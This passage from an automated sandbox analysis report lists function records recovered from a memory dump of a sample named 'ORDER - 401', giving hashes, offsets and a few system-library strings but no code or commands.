                                                                                  • Instruction ID: 5e07659a9be35b3038924c7ab08732b8bf5e2a3b5073ebc0215cb5486c388f4b
                                                                                  • Opcode Fuzzy Hash: 2c9971b9e29068ac92547488b012c896d4b4eec2bca706cccddf8aaac158702b
                                                                                  • Instruction Fuzzy Hash: 6441CF70B05695DBDB12CF69C840BAEBBF4FF84700F1480A5E984DB295E3B9DA40CB54
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                  • API String ID: 2994545307-4008356553
                                                                                  • Opcode ID: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
                                                                                  • Instruction ID: e23b596c0cab994c9b3a0747858a4912db12baad5fafbd291348770090601b7c
                                                                                  • Opcode Fuzzy Hash: 19e0258bdbc0d60e30530ccd7da83a80247c8879d8465fd66952e10b2e67fd41
                                                                                  • Instruction Fuzzy Hash: 310128B2680740EFE311DF14CD85F5677E8E788B19F008939B699C7190E774D804CB4A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: MUI
                                                                                  • API String ID: 0-1339004836
                                                                                  • Opcode ID: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
                                                                                  • Instruction ID: 05c2640da8e6c416eeeba1188a79f75b8923de8304c8a2d312dac4330390ef6d
                                                                                  • Opcode Fuzzy Hash: 5ef713996f3a59018896c52b3c327db0c10a53522baf121193d2c98729a6dc91
                                                                                  • Instruction Fuzzy Hash: E0828D75E402188FEB65CFA8C9847EDBBB1BF48310F1481A9E999AB358D7389D41CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
                                                                                  • Instruction ID: 222f189b77e684d18419f4b581182ca641e12150b32975e559b146aa7c55b00f
                                                                                  • Opcode Fuzzy Hash: 5aa45d6498615d48b27894d55710bc3046d3939fec8ccf6ba5955b1d752e933f
                                                                                  • Instruction Fuzzy Hash: 0C916D72A00219ABEF21DF95CC95FEEBBB8EF58B50F104065F640AB190D775AD04DBA0
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
                                                                                  • Instruction ID: 45589de4cde3eae3ed48e999e8570afaab4c40a0730eb63356aa8c55f3c40402
                                                                                  • Opcode Fuzzy Hash: c67b1a42ef7c7353776542f921f6807e69fb7835d8ca1123b2b7a118901074ff
                                                                                  • Instruction Fuzzy Hash: 7991D271901609BFDB22AFA4DC84FEFBBB9EF45B40F100025F581A7251EB359941CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: GlobalTags
                                                                                  • API String ID: 0-1106856819
                                                                                  • Opcode ID: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
                                                                                  • Instruction ID: 27aabf02c525399b0ceacf386902c541c68ecbd004b3ce667810ec32d6d69464
                                                                                  • Opcode Fuzzy Hash: 77b02014af701917de856287b5b8f130824045b65cb33b139abeb24713428192
                                                                                  • Instruction Fuzzy Hash: 10718DB5E0420ACFDF68EF98C5906EDBBF1BF48700F15816AE586AB341E7328941CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .mui
                                                                                  • API String ID: 0-1199573805
                                                                                  • Opcode ID: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
                                                                                  • Instruction ID: 75443aef52c39e1865fef83926a1a80bdeec37c58f8420dfdf1ebce63e647305
                                                                                  • Opcode Fuzzy Hash: 49b530387fd2200187ad3965b1a2facb4f1b662cabb95cd114cca5507a84b557
                                                                                  • Instruction Fuzzy Hash: 6251A872D0022A9BDF10DF99C880EEEBBB8AF15714F054169EA92FB241D3749D01CBE4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: EXT-
                                                                                  • API String ID: 0-1948896318
                                                                                  • Opcode ID: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
                                                                                  • Instruction ID: cd9efec77e4df7a3ded7c7181dc49a52e0a97a4a5a28b998b390af3a53f95b7a
                                                                                  • Opcode Fuzzy Hash: 940a3e8b46cfd96de01a1ff33c8b831b87c361106890705d5ccec598edbe8e5d
                                                                                  • Instruction Fuzzy Hash: 9341AE72548322ABD720DA75C884BAFBBE8BF88B14F04096DFAC4D7180E674D904C797
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryHash
                                                                                  • API String ID: 0-2202222882
                                                                                  • Opcode ID: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
                                                                                  • Instruction ID: 090d945ad477d6774dc75c7ea699ea38f7e918c9ad39f30f25e5b675b5085e4a
                                                                                  • Opcode Fuzzy Hash: f57f0beec3a704196279f4be0634125c0247af411e1550e0db23df91e104471d
                                                                                  • Instruction Fuzzy Hash: 234144B1D1412DEBEB21EB50CD84FDEB77CAB44714F0045A5AA88AB140DB709E898BA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: #
                                                                                  • API String ID: 0-1885708031
                                                                                  • Opcode ID: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
                                                                                  • Instruction ID: d3e1ab36237dc4632e784d0de150ee335a6e3f6f1503b93ac3931e3d634c4aae
                                                                                  • Opcode Fuzzy Hash: dcee3bb3f16fab64813e1f6466476f21b6b9ffcee46a0fb19534b90bfb561f1e
                                                                                  • Instruction Fuzzy Hash: F7311C31A0071D9ADB22DFA9C854BFEBBF8DF44704F584068E9919B281D777E845CB50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: BinaryName
                                                                                  • API String ID: 0-215506332
                                                                                  • Opcode ID: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
                                                                                  • Instruction ID: d39a14d35c059b59bbefc901626ac7c88b87e0398af0aa5b9947f9f6663fac2a
                                                                                  • Opcode Fuzzy Hash: 0e75ebabe379081c34a12479d5b52aba0c7642da25b7e397acec1e6fd55c82fe
                                                                                  • Instruction Fuzzy Hash: 4F31F136904919AFFB15EA58CA45EEFBBB4EF80720F014169E985A7250D7309E00DBE0
                                                                                  Strings
                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0109895E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                  • API String ID: 0-702105204
                                                                                  • Opcode ID: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
                                                                                  • Instruction ID: ccec44db1c0cefa15ddb5ea97df39cdc427fe1431ce06b966d7839fd1e22b691
                                                                                  • Opcode Fuzzy Hash: 1dabec5677b9a36bcbefe98fe8d3767aa6de885724ebc014e0225e44007f09d0
                                                                                  • Instruction Fuzzy Hash: B60170327002099FEF7A5B15CCA4B5A3FA1EF87354B0C402DF7C106651CFA06880EB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
                                                                                  • Instruction ID: d66f82fe80fc835b2c85b8087b3e5a41f99c3fbed875c2f49b1f8e8d49ebdca1
                                                                                  • Opcode Fuzzy Hash: 3e8f34bc71aa47178d05220b4ce7afd320a8e94fea4b1887ae8e835a1e88b24c
                                                                                  • Instruction Fuzzy Hash: 2842D0326083419BE765CF68C8D0AAFBBE5BF98740F08496DFAC297250D735E845CB52
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
                                                                                  • Instruction ID: 77be9f6b7af6fbbdfd33de6879849edc76cfe0ba538a0f012708f5cb58b3a4c4
                                                                                  • Opcode Fuzzy Hash: 2cb5c0a1b173f68f0d3f66963c8f08dd4ad7bf63b38c0667509bdb5276490568
                                                                                  • Instruction Fuzzy Hash: 9F424D75E002198FEB64CFA9C841BEDBBF5BF48301F54C19AE989AB241DB349985CF50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b551359dad359f9fe480b5e1ba48a5ed8ccfbf29958d1a98ed499cd29489b3af
                                                                                  • Instruction ID: 991c32527ed3a8bd4cc8f986b1860ab46cff10a44b43bcc06a8e19a77b8ec08d
                                                                                  • Opcode Fuzzy Hash: b551359dad359f9fe480b5e1ba48a5ed8ccfbf29958d1a98ed499cd29489b3af
                                                                                  • Instruction Fuzzy Hash: 6A32DD70E00B598BEB65CFA9C8447BEBBF2BF84704F14415DD4C69B285DB36A842CB54
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fbe2c44947d74f443626cb1c62419c9632441e1383d6538d210d6b5c2a624076
                                                                                  • Instruction ID: 9e774433f9994501b5ae4f6e5d3f66651014c335a8bc6b6f73038f30c07b6152
                                                                                  • Opcode Fuzzy Hash: fbe2c44947d74f443626cb1c62419c9632441e1383d6538d210d6b5c2a624076
                                                                                  • Instruction Fuzzy Hash: DE22AE70704661CBEB65CF2DC4D47B6BBE1BF44300F08849AE9D68B286E779D592CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d4a4442207c03171a943c63b6190e38039ad625e2203bd68e29807ca0fc1e6b9
                                                                                  • Instruction ID: 71d4db839c143ddb6c42e7a06549ee11aa840fad1164f81c373302552aca8483
                                                                                  • Opcode Fuzzy Hash: d4a4442207c03171a943c63b6190e38039ad625e2203bd68e29807ca0fc1e6b9
                                                                                  • Instruction Fuzzy Hash: DC32A171A04205CFDB65CFA8C880BAEBBF1FF48310F1485A9E995AB395DB75E841CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction ID: f3a3f594b25d6d96010acf8ca4d1476267285c5c4eb41e18d9a18cf562acb229
                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                  • Instruction Fuzzy Hash: EAF16171E0021A9BDB55DF99C590BEEBBF9BF88710F088169E985EB240D774D841CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 83711a3ccd5e7f41eb58d507943035d344acad50c54a6b6ea77be9161f496003
                                                                                  • Instruction ID: f550a79533d584e6347c0cbd5700f4595faf5b7bd3e67032811909c42d999583
                                                                                  • Opcode Fuzzy Hash: 83711a3ccd5e7f41eb58d507943035d344acad50c54a6b6ea77be9161f496003
                                                                                  • Instruction Fuzzy Hash: 0ED1F271E0060A8BDF19CFA9C841AFEB7F1BF88305F58C16AD995A7241E735E905CB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5549a559a106f779f68e639a490c14ada0e0dc5bff383ea14f3d870ebc326f39
                                                                                  • Instruction ID: b4eac83d38eeb876e6c4e7f95bd98548be6a12856bc485d2333bc623cf5544f3
                                                                                  • Opcode Fuzzy Hash: 5549a559a106f779f68e639a490c14ada0e0dc5bff383ea14f3d870ebc326f39
                                                                                  • Instruction Fuzzy Hash: F9E1C071608342CFC715CF28C480A6ABBE1FF89304F058AADE9D987355DB76E905CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ede768d0fdbfde5acadf674e23dc162661343c479c24b8200a8aab0209053550
                                                                                  • Instruction ID: b1251d3e983e97b03f3c88fe70eedf8e31ee85710ddfb3222a0b6f9ca02cd7dc
                                                                                  • Opcode Fuzzy Hash: ede768d0fdbfde5acadf674e23dc162661343c479c24b8200a8aab0209053550
                                                                                  • Instruction Fuzzy Hash: 64D1D371A006069BEB16DF28C880ABE77E5BF54304F05856EFA95DB2C0EB34D955CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction ID: b7efb248e66a3617796e29426f1336f9f21ef54b0bd4dd36029be012cc5abc96
                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                  • Instruction Fuzzy Hash: 85B16474A006099FDF64DF55C950AABBBF9BF86304F10C4AEAA82D7790DA34E905DB10
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction ID: 1bc9e6742ea93cda7a64db3eb2c905f671f229a634b128975fc38506d4c634ac
                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                  • Instruction Fuzzy Hash: 09B1C431A00756AFDB26DB68C854BBFBBF6AF48300F140599E5D2DB285DB30E941CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d801e95d874d79ae85be17c2e7d9ed2e8ffc0c66b7020662c65de4b8306d548f
                                                                                  • Instruction ID: 9c183e729fabe80422a613dbd83afc1b5fd0446184d159a99b22f58449b5aad5
                                                                                  • Opcode Fuzzy Hash: d801e95d874d79ae85be17c2e7d9ed2e8ffc0c66b7020662c65de4b8306d548f
                                                                                  • Instruction Fuzzy Hash: 58C148745083418FE764CF19C484BAABBE5FF88304F44896EE9C987291DB74EA05CF92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 435d3c6bad7bda9e7cc26dc6ad404d7297362a36fc864d6fc041db2f5d513fe6
                                                                                  • Instruction ID: ee8b76b8e394d0bf0824f9f8f73a0ab6dcfe25170052d724808afe82ec57ca43
                                                                                  • Opcode Fuzzy Hash: 435d3c6bad7bda9e7cc26dc6ad404d7297362a36fc864d6fc041db2f5d513fe6
                                                                                  • Instruction Fuzzy Hash: 8BB17274A002568BEB75DF58C980BADB3F5EF44740F0485E9D58AEB291EB319DC5CB20
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 85f98a7f775082196c2c3745b0e85e8be8d500ce132ae426f2ce4eceea473d55
                                                                                  • Instruction ID: 2406313b7f25f90ffacd338773fa1407ffd5594acfea8c2f33ea0a0e2cc4f51e
                                                                                  • Opcode Fuzzy Hash: 85f98a7f775082196c2c3745b0e85e8be8d500ce132ae426f2ce4eceea473d55
                                                                                  • Instruction Fuzzy Hash: 69A14971E0061AAFEB22DB58C944BEE7BF8BF44754F040261EAE0AB291D7749D40CBD5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 067d5caae7faaf0d1c5cc7d9dca16b5d93994c3afc5db0dc880efdc40f6f1ad5
                                                                                  • Instruction ID: d7c0110071e5b88556dcb6cafaa236909df31018def2f75bf64944c791d7c727
                                                                                  • Opcode Fuzzy Hash: 067d5caae7faaf0d1c5cc7d9dca16b5d93994c3afc5db0dc880efdc40f6f1ad5
                                                                                  • Instruction Fuzzy Hash: EAA1C170B006169BDBA5EF69C990BBFBBE5FF44318F004069EEC597286DB34A851CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4ce8f19082bfe3b05bc05feaea4a9fc910fda92b291e6889944cc4771f178c9a
                                                                                  • Instruction ID: 2c6c18b7093528caf2773d6761bd2edb58976df5e381d6024e0c6b2903eb90a5
                                                                                  • Opcode Fuzzy Hash: 4ce8f19082bfe3b05bc05feaea4a9fc910fda92b291e6889944cc4771f178c9a
                                                                                  • Instruction Fuzzy Hash: DBA1EB72A00212EFC726DF29C984BAABBE9FF48304F450568E5C9DB651C774ED40CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e2d36979278248d4cae5d38234384a109b36192b582fa8bfbbad2232816a243a
                                                                                  • Instruction ID: eb71aed2d40a883699760013ff5f0a0e012c506ef91f6790eba1aa5959fe99d5
                                                                                  • Opcode Fuzzy Hash: e2d36979278248d4cae5d38234384a109b36192b582fa8bfbbad2232816a243a
                                                                                  • Instruction Fuzzy Hash: 3491C871D00215AFDF15CFA8D8A4BBEBFB5AF48710F158199E690EB340D775D900ABA0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 809b909373ac6ea12107d0e90956895887d4882eeb3ca2e6f0925339a3417f42
                                                                                  • Instruction ID: 73cbd22e7b0514c51eb21e51d6419546208ebf293c9329f14f93549705b401af
                                                                                  • Opcode Fuzzy Hash: 809b909373ac6ea12107d0e90956895887d4882eeb3ca2e6f0925339a3417f42
                                                                                  • Instruction Fuzzy Hash: 54911331E406369BEB25DB5DC840BBE7BE1EF94724F0580A9E9859B380EB34D941C791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7dba25a39d6734f088c9125c06b824616462a0ea08e214f92e745aaf7ad10f7e
                                                                                  • Instruction ID: 370701f65b4d3f922c24284137240145b91e2632bead32fb513c75dbf05a946f
                                                                                  • Opcode Fuzzy Hash: 7dba25a39d6734f088c9125c06b824616462a0ea08e214f92e745aaf7ad10f7e
                                                                                  • Instruction Fuzzy Hash: 1281A471E0061A9BDB18CF69C880AFEBBF9FB48710F14852EE485D7640E735D981CB94
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                  • Instruction ID: df18b483ce1d5e809f7e3af26150c925fa5f3975e837d00fec368e3a5dfe7150
                                                                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                  • Instruction Fuzzy Hash: C5816E31B00309DFDF19DF98C880AAEBBF6AF84310F1885A9D9969B385D774E901CB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 236dd0e17ec350fb15e3f09b452cc13396a4ed0ff1016ce344c48f4d4d76c0d6
                                                                                  • Instruction ID: 8d9cfedf46173b71200a85ce05c8f20d1b3d12f018d5c8bf6eabcffeb53e71c5
                                                                                  • Opcode Fuzzy Hash: 236dd0e17ec350fb15e3f09b452cc13396a4ed0ff1016ce344c48f4d4d76c0d6
                                                                                  • Instruction Fuzzy Hash: 7371D1716047069FDB61DF19C880B6BB7ECFB48368F01896AE9D5C7A00E330E854CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2477842446.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_fe0000_ORDER - 401.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
